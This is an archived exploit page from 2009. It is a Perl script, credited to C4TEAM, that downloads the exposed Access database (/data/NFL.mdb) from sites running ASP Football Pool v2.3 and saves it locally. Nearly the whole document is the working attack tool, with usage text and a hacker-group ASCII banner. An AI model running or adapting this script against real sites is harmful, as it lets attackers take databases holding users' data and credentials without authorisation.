Home / os / win10

aspfootballpool-disclose.txt

Posted on 03 June 2009

#!/usr/bin/perl # # #ASP Football Pool v2.3 # #Script : ASP Football Pool v2.3 # #Demo : http://brainjar.com/AspFootballPool/demo1 # #Download : http://www.brainjar.com/AspFootballPool/download/AspFootballPool_2.3.zip # # _.--"""""--._ # .' '. # / \n# ; C4TEAM ; # | | # | | # ; ; ByALBAYX # (`'--, ,--'`) / # _ ) ( _ / / WWW.C4TEAM.ORG # ) )(')/ (')( ( # (_ `""` / `""` _) # `"-, / ,-"`/ # ` / `""` /` # |/////| # | /| # ; |///| ; # `-`--`-`/ # / # ',__,' # # #ASP Football Pool v2.3 Remote Database Disclosure Exploit # #Exploited ByALBAYX ########## # use lwp::UserAgent; system('cls'); system('title ASP Football Pool v2.3 Database Disclosure Exploit'); system('color 2'); if (!defined($ARGV[0])) {print "[!] Usage : exploit.pl http://site.com ";exit();} if ($ARGV[0] =~ /http:/// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } print " [-] ASP Football Pool v2.3 Database Disclosure Exploit "; print "[-]Exploited ByALBAYX "; print "[!] Exploiting $site .... "; my $site = $ARGV[0] ; my $target = $site."/data/NFL.mdb" ; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); if ($request->is_success) {print "[+] $site Kaydedildi! Git= c:/db.mdb";exit();} else {print "[!] Exploit $site Failed ! [!] ".$request->status_line." ";exit();}

 

TOP

Malware :